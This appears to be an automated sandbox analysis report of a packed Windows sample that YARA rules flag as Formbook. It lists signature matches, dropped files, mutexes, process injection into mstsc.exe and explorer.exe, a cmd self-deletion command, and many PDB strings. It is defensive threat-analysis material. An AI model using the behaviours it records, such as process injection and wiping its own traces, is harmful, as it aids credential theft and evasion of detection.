          Source: 00000001.00000002.721927497.0000000001090000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.721927497.0000000001090000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.686008623.0000000003DFA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.686008623.0000000003DFA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.1025912109.0000000000140000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1025912109.0000000000140000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.686170457.0000000003F66000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.686170457.0000000003F66000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.722073173.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.722073173.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Explorer.EXE_7abfb1f1fbdbd7c2322150249348b63f54b8a170_10665708_1ba816b7\Report.wer, type: DROPPEDMatched rule: SUSP_WER_Critical_HeapCorruption date = 2019-10-18, author = Florian Roth, description = Detects a crashed application that crashed due to a heap corruption error (could be a sign of exploitation), reference = https://twitter.com/cyb3rops/status/1185459425710092288, score =
          Source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@11/24@5/2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_01
          Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3424
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeFile created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to behavior
          Source: unknownProcess created: C:\Windows\explorer.exe
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\explorer.exeFile read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exeVirustotal: Detection: 28%
          Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe'
          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
          Source: unknownProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3424 -s 8832
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe
          Source: unknownProcess created: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe 'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe' -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
          Source: unknownProcess created: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe 'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe' -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{660b90c8-73a9-4b58-8cae-355b7f55341b}\InProcServer32
          Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeFile opened: C:\Windows\SYSTEM32\msftedit.dll
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: Windows.Data.Activities.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: syncreg.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: CapabilityAccessManagerClient.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: Windows.Storage.Search.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: authui.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: Windows.Internal.Signals.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000A.00000003.747630209.000001EDC50E0000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, mstsc.exe
          Source: Binary string: HolographicExtensions.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000001.00000000.675621631.0000000000712000.00000002.00020000.sdmp, mstsc.exe, 00000006.00000002.1034631298.0000000004C7F000.00000004.00000001.sdmp
          Source: Binary string: LanguageOverlayUtil.pdb}S source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: SLC.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: cscobj.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows.pdblR5 source: WerFault.exe, 0000000A.00000003.746829519.000001EDC4ED0000.00000004.00000001.sdmp
          Source: Binary string: SettingMonitor.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: StructuredQuery.pdbYS` source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: werconcpl.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: Windows.Internal.Signals.pdbiS0 source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: Windows.CloudStore.Schema.Shell.pdb source: WerFault.exe, 0000000A.00000003.747586781.000001EDC805E000.00000004.00000001.sdmp
          Source: Binary string: d3d10warp.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: msi.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: Windows.ApplicationModel.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: twinui.pcshell.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: PeopleBand.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: AboveLockAppHost.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: mpr.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: ExecModelProxy.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: grooveex.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: imapi2.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: windows.ui.xaml.pdb6u source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: Windows.StateRepositoryBroker.pdbf source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: srchadmin.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: WindowsCodecs.pdb)Sp source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: ApplicationFrame.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: shlwapi.pdb| source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: wkscli.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: mstsc.pdb source: AddInProcess32.exe, 00000001.00000002.724998329.0000000002D60000.00000040.00000001.sdmp
          Source: Binary string: WpnClient.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: NotificationControllerPS.pdbyS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: shdocvw.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: WINMMBASE.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: twinapi.pdbg source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: TileControl.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: OneCoreCommonProxyStub.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: PlayToDevice.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: TileDataRepository.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.700089831.0000000005A00000.00000002.00000001.sdmp, explorer.exe, 00000010.00000002.1048482581.00000000070D0000.00000002.00000001.sdmp
          Source: Binary string: msvcp110_win.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: AboveLockAppHost.pdb1SX source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: nsi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: SndVolSSO.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: winmm.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: TaskFlowUI.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: 5.pdb2R source: WerFault.exe, 0000000A.00000002.761878802.000001EDC4EA8000.00000004.00000020.sdmp
          Source: Binary string: ole32.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: Windows.UI.Core.TextInput.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: provsvc.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: Windows.UI.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: AppXDeploymentClient.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: dusmapi.pdb%jI source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows.pdb source: WerFault.exe, 0000000A.00000003.746829519.000001EDC4ED0000.00000004.00000001.sdmp
          Source: Binary string: combase.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: Windows.UI.Shell.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: InputSwitch.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: cflapi.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: DataExchange.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: provsvc.pdbuj source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: Windows.Data.Activities.pdbaS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: Bcp47mrm.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: usermgrcli.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: kernelbase.pdb source: WerFault.exe, 0000000A.00000003.747630209.000001EDC50E0000.00000004.00000040.sdmp
          Source: Binary string: SettingMonitor.pdb:uT source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: Windows.UI.Core.TextInput.pdbIS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: wininet.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: Windows.UI.Immersive.pdb5SD source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: prnfldr.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: twinapi.appcore.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: nlaapi.pdb0t/ source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: Windows.Networking.Connectivity.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: nsi.pdbRjz source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: ActXPrxy.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: Windows.CloudStore.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: ColorAdapterClient.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: mlang.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: pcacli.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: combase.pdb8 source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: NotificationControllerPS.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: sppc.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: oleacc.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: wevtapi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: framedynos.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: samcli.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: shell32.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: sspicli.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: UiaManager.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: dsreg.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: Windows.StateRepository.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: ActionCenter.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: SettingSyncCore.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: msoshext.pdb0 source: WerFault.exe, 0000000A.00000003.747320665.000001EDC8062000.00000004.00000001.sdmp
          Source: Binary string: dusmapi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: cscapi.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: ntasn1.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: d3d11.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: ShellCommonCommonProxyStub.pdbuS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: vcruntime140.amd64.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: gdi32.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: MobileNetworking.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: WindowsCodecs.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: avrt.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: winmm.pdb{ source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: ShellCommonCommonProxyStub.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: smartscreenps.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: sechost.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: wmiclnt.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: twinui.appcore.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: propsys.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: WindowsInternal.ComposableShell.Experiences.Switcher.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: samlib.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: atlthunk.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: bthprops.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: msctf.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: linkinfo.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: wscinterop.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: win32u.pdb0 source: WerFault.exe, 0000000A.00000003.739016455.000001EDC6E52000.00000004.00000001.sdmp
          Source: Binary string: mscms.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.700089831.0000000005A00000.00000002.00000001.sdmp, WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp, explorer.exe, 00000010.00000002.1048482581.00000000070D0000.00000002.00000001.sdmp
          Source: Binary string: user32.pdb source: WerFault.exe, 0000000A.00000003.738993307.000001EDC6E48000.00000004.00000001.sdmp
